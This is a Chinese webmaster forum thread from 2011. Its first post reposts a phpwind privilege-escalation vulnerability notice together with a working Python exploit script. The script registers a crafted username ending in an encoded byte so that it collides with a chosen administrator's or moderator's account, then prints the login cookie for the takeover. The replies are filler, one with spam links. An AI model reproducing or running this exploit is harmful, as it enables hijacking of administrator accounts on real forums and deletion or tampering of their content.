天天站长

 找回密码
 用户注册
查看: 705|回复: 3

phpwind管理权限泄露漏洞

[复制链接]

31

主题

0

听众

123

积分

中级会员

Rank: 2

UID
58340
积分
123
威望
0
金币
85
贡献
0
活跃
10
魅力
1
注册时间
2011-6-1
发表于 2011-6-24 10:26:11 |显示全部楼层
phpwind管理权限泄露漏洞


漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作
漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限
漏洞测试:

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)


def banner():
    print ""
    print "########################################################"
    print "Phpwind所有版本管理权限泄露漏洞利用poc"
    print "Copyright (C) 2006"
    print "jianxin@80sec.com"
    print "80sec是一个新的致力于web安全的小团体"
    print "http://www.iisp.com/?s=macui"

def usage():
    banner()
    print "Usage:\n"
    print "   $ ./phpwind.py pwforumurl usertoattack\n"
    print "   pwforumurl 目标论坛地址如http://www.80sec.com/"
    print "   usertoattack 目标拥有权限的斑竹或管理员"
    print "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
    print "   最新版本可以使用uid登陆"
    print "   其他版本可以使用cookie+useragent登陆"
    print "########################################################"
    print ""


argvs=sys.argv
usage()


data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
pwurl = "%s/register.php" % argvs[1]

request = urllib2.Request(
url     = pwurl ,
        headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
        data    = data)

f=opener.open(request)
headers=f.headers.dict
cookie=headers["set-cookie"]
try:
if cookie.index('winduser'):
print "Exploit Success!"
print "Login with uid password @80sec or Cookie:"
print cookie
print "User-agent: 80sec owned this"
except:
print "Error! http://www.iisp.com/?s=macui"
print "Connect root#80sec.com"

耐思尼克,云主机,虚拟主机,网站建设,建站宝盒


166

主题

0

听众

1182

积分

黄金会员

Rank: 4

UID
58585
积分
1182
威望
0
金币
680
贡献
0
活跃
88
魅力
1
注册时间
2012-4-2
发表于 2012-4-20 11:56:32 |显示全部楼层
现在生意是越来越不好做了哦。。。。
回复

使用道具 举报

38

主题

0

听众

207

积分

中级会员

Rank: 2

UID
58877
积分
207
威望
0
金币
140
贡献
0
活跃
20
魅力
1
注册时间
2012-5-23
发表于 2012-5-30 19:33:19 |显示全部楼层
看不懂。。。专业啊。。。。。。
[url=http://www.5msb.com]电力设备[/url]
[url=http://www.5msb.com]中外设备[/url]
回复

使用道具 举报

0

主题

1

听众

247

积分

中级会员

Rank: 2

UID
59189
积分
247
威望
0
金币
148
贡献
0
活跃
18
魅力
1
注册时间
2012-7-1
发表于 2012-7-28 20:58:06 |显示全部楼层
看不懂。。。专业啊
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 用户注册


|申请友情链接|关于我们|商家合作|广告报价|联系我们|法律声明|隐私条款|无图浏览|手机浏览|  


敬请您尊重网上道德,遵守《全国人大常委会关于维护互联网安全的决定》及中华人民共和国其它各项有关法律法规。

本网所有帖子均来源网友上传,本站未进行任何修改和未获取任何利益,且仅代表作者本人意见,不代表本网站立场。

天天站长 技术支持:杭州桐庐家园网络技术有限公司 广告合作:13968063988 在线QQ:18118865

Copyright ©2003-2012 Powered by 安网数据 All Rights Reserved. 备案信息:浙B2-20060153号